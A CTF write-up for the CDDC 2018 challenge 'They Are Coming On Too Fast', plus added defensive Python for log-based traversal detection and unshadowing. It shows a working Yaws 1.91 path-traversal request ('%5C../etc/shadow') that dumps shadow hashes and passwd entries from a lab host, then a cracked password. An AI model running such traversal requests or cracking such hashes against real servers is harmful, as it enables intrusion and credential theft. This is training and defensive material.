CDDC 2018: They Are Coming On Too Fast

Category: Kamikaze
Points: 126s
Description:

  1. From your position on target 10.50.0.199, exploit the target 10.50.199.11 and gain access to the file '/etc/passwd'.
  2. Inside the file, identify the username starting with the case-sensitive letter 'h'.
  3. Enter the correct username into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

Attempting to access the webserver on 10.50.199.11, we get

# curl -k 'https://10.50.199.11/' -L
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
 <head>
  <title>Index of /</title>
  <style type="text/css">
    img { border: 0; padding: 0 2px; vertical-align: text-bottom; }
    td  { font-family: monospace; padding: 2px 3px; text-align:left;
          vertical-align: bottom; white-space: pre; }
    td:first-child { text-align: left; padding: 2px 10px 2px 3px; }
    table { border: 0; }
  </style>
</head> 
<body>
<h1>Index of /</h1>
<table>
  <tr>
    <td><img src="/icons/blank.gif" alt="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"/><a href="?N=r">Name</a></td>
    <td><a href="?M=r">Last Modified</a></td>
    <td><a href="?S=r">Size</a></td>
    <td><a href="?D=r">Description</a></td>
  </tr>
  <tr><th colspan="4"><hr/></th></tr>
  <tr>
    <td><img src="/icons/back.gif" alt="[DIR]"/><a href="..">Parent Directory</a></td>
    <td></td>
    <td>-</td>
    <td></td>
  </tr>
  <tr>
    <td><img src="/icons/compressed.gif" alt="[DIR]"/><a href="all.zip">all.zip</a></td>
    <td></td>
    <td>-</td>
    <td>Build a zip archive of current directory</td>
  </tr>
  <tr>
    <td><img src="/icons/dir.gif" alt="[DIR]"/><a href=".ICE-unix" title=".ICE-unix">.ICE-unix</a></td>
    <td>01-Jun-2018 08:01</td>
    <td>4k</td>
    <td></td>
  </tr>
  <tr>
    <td><img src="/icons/dir.gif" alt="[DIR]"/><a href=".X11-unix" title=".X11-unix">.X11-unix</a></td>
    <td>01-Jun-2018 08:01</td>
    <td>4k</td>
    <td></td>
  </tr>
  <tr><th colspan="4"><hr/></th></tr>
</table>
<address> Yaws 1.91 Server at cddc-ot-svr1 </address></body>
</html>

Knowing that, a quick Google search for Yaws 1.91 turns up, as the first result, a remote file disclosure exploit. Adding %5C (a URL-encoded backslash) in front of the ../ sequence in the request path lets us retrieve /etc/shadow and /etc/passwd.

[root@fw2018 ~]# curl -k 'https://10.50.199.11/%5C../etc/shadow' -L
root:$6$tBedrW0t$WxW/LC8v5/L5b2UhZVtWAg4Nc9rJVIk8LZng38V77T5Bj1BlpdrzlfZqL5b1AJAwvb4uvbuEhoNgga44gWYbY/:17575:0:99999:7:::
daemon:*:17553:0:99999:7:::
bin:*:17553:0:99999:7:::
sys:*:17553:0:99999:7:::
sync:*:17553:0:99999:7:::
games:*:17553:0:99999:7:::
man:*:17553:0:99999:7:::
lp:*:17553:0:99999:7:::
mail:*:17553:0:99999:7:::
news:*:17553:0:99999:7:::
uucp:*:17553:0:99999:7:::
proxy:*:17553:0:99999:7:::
www-data:*:17553:0:99999:7:::
backup:*:17553:0:99999:7:::
list:*:17553:0:99999:7:::
irc:*:17553:0:99999:7:::
gnats:*:17553:0:99999:7:::
nobody:*:17553:0:99999:7:::
libuuid:!:17553:0:99999:7:::
syslog:*:17553:0:99999:7:::
messagebus:*:17553:0:99999:7:::
landscape:*:17553:0:99999:7:::
sshd:*:17553:0:99999:7:::
pollinate:*:17553:0:99999:7:::
ntp:*:17553:0:99999:7:::
hero:$6$Pp5IF6vM$PBUVJNHiMRcJcI3J/ZKTAcIzl2O0QcrAFhnUy1beS856o0mml4MCsfPCXJWsEyaL4eqX7GNiQZUcctjNbZ4NT0:17575:0:99999:7:::
ubuntu:!:17665:0:99999:7:::
osboxes:*:17665:0:99999:7:::
moveforwarduser:$6$mfPzC55B$6VoacTQsoLMnZ3HHQPX7jR2Pcdowu9VWSttZ1xkcUTw7en5Bnr07u0ezRLtD4q6yVQb80lnAAMBbBbGuotPTk.:17665:0:99999:7:::
[root@fw2018 ~]# curl -k 'https://10.50.199.11/%5C../etc/passwd' -L
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ntp:x:106:111::/home/ntp:/bin/false
hero:x:1000:1000:,,,:/home/hero:/bin/bash
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
osboxes:x:1002:1003::/home/osboxes:/bin/bash
moveforwarduser:x:1003:1004:,,,:/home/moveforwarduser:/bin/bash
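From the defender's side, the request above is easy to spot once paths are normalised before being checked. The following Python detector is an added example, not part of the original write-up and not Yaws's own parser: it percent-decodes repeatedly (so doubly encoded variants are not missed), treats backslash as a separator, resolves '.' and '..', and flags any request that climbs above the document root when run over constructed access-log lines. The log lines and the exact normalisation rules are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format (not from the original
# write-up); the third request mirrors the %5C../ path shown in this write-up.
SAMPLE_LOG = """\
10.50.0.199 - - [01/Jun/2018:08:05:01 +0000] "GET / HTTP/1.1" 200 1532
10.50.0.199 - - [01/Jun/2018:08:05:02 +0000] "GET /all.zip HTTP/1.1" 200 9120
10.50.0.199 - - [01/Jun/2018:08:05:03 +0000] "GET /%5C../etc/passwd HTTP/1.1" 200 1804
10.50.0.199 - - [01/Jun/2018:08:05:04 +0000] "GET /%255c%252e%252e/etc/shadow HTTP/1.1" 200 1610
10.50.0.199 - - [01/Jun/2018:08:05:05 +0000] "GET /docs/../index.html HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')

def escapes_docroot(raw_path: str, max_decode: int = 3) -> bool:
    """True if the request path climbs above the document root once
    percent-encoding is undone (repeatedly, bounded by max_decode), backslash
    is treated as a separator like '/', and '.' / '..' segments are resolved."""
    path = raw_path.split("?", 1)[0]
    for _ in range(max_decode):          # decode until the string stops changing
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if depth == 0:
                return True              # '..' with nothing left to pop: escape
            depth -= 1
        else:
            depth += 1
    return False

def flag_traversal(log_text: str) -> list:
    """Return the raw request paths in the log that escape the docroot."""
    flagged = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_docroot(m.group("path")):
            flagged.append(m.group("path"))
    return flagged

if __name__ == "__main__":
    for p in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", p)
```

A plain `/docs/../index.html` stays inside the docroot and is not flagged, which keeps the check from firing on ordinary relative links.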

A little filtering and unshadowing later, we get three nice password hashes,

root:$6$tBedrW0t$WxW/LC8v5/L5b2UhZVtWAg4Nc9rJVIk8LZng38V77T5Bj1BlpdrzlfZqL5b1AJAwvb4uvbuEhoNgga44gWYbY/:0:0:root:/root:/bin/bash
hero:$6$Pp5IF6vM$PBUVJNHiMRcJcI3J/ZKTAcIzl2O0QcrAFhnUy1beS856o0mml4MCsfPCXJWsEyaL4eqX7GNiQZUcctjNbZ4NT0:1000:1000:,,,:/home/hero:/bin/bash
moveforwarduser:$6$mfPzC55B$6VoacTQsoLMnZ3HHQPX7jR2Pcdowu9VWSttZ1xkcUTw7en5Bnr07u0ezRLtD4q6yVQb80lnAAMBbBbGuotPTk.:1003:1004:,,,:/home/moveforwarduser:/bin/bash
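The "filtering and unshadowing" step is just a keyed merge of the two colon-separated files followed by dropping the locked accounts. As an added illustration (not the write-up's own tooling), this Python snippet performs that merge on constructed passwd/shadow excerpts, names the crypt scheme from the $id$ prefix, and returns the users that still carry a real hash, optionally restricted by the first letter of the username as the challenge asks. The hash values are placeholders.

```python
# Constructed passwd/shadow excerpts (not the write-up's own output); the
# hash values are placeholders in the $6$salt$hash layout seen above.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hero:x:1000:1000:,,,:/home/hero:/bin/bash
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
"""
SHADOW = """\
root:$6$saltroot$PLACEHOLDERHASH:17575:0:99999:7:::
daemon:*:17553:0:99999:7:::
hero:$6$salthero$PLACEHOLDERHASH:17575:0:99999:7:::
ubuntu:!:17665:0:99999:7:::
"""

# crypt(3) scheme identifiers found after the leading '$' in a shadow hash
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

def parse_colon_file(text):
    """Map the first field (username) of each non-empty line to its field list."""
    rows = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows

def unshadow(passwd_text, shadow_text):
    """Replace the 'x' in passwd's password field with the hash from shadow,
    producing the user:hash:uid:gid:gecos:home:shell lines cracking tools read."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for user, fields in parse_colon_file(passwd_text).items():
        if len(fields) == 7:                 # skip malformed passwd rows
            fields = list(fields)
            if user in shadow:
                fields[1] = shadow[user][1]
            merged.append(":".join(fields))
    return merged

def hash_algorithm(field):
    """Name the crypt scheme from the $id$ prefix, or None for locked/absent
    passwords ('*', '!', '!!', empty, or 'x' with no shadow entry)."""
    if not field.startswith("$"):
        return None
    return CRYPT_IDS.get(field.split("$")[1], "unknown")

def crackable_users(passwd_text, shadow_text, first_letter=""):
    """Users whose merged entry carries a real hash, optionally filtered by
    the case-sensitive first letter of the username."""
    return [e.split(":")[0] for e in unshadow(passwd_text, shadow_text)
            if hash_algorithm(e.split(":")[1]) and e.startswith(first_letter)]
```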

Attempting to crack each one gives,

root:
hero:batman
moveforwarduser:

As the question asks specifically for the username starting with the case-sensitive letter 'h', we have our flag already.

Therefore, the flag is hero.
